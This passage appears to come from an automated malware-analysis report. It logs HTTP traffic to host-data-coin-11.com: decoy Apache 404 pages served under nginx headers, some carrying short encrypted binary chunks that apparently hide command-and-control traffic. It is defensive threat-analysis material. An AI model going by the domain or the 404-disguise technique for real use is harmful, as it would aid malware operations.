20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:01 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:01 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:01 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2dI:82OI:J_J-WS,/0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a | Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a | Data Ascii: 48I:82OOjQmFqdV@dfkK50
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Fri, 14 Jan 2022 19:21:46 GMT | Content-Type: text/html | Content-Length: 178 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 30I:82OR&:UPJ$dP0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 19:23:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
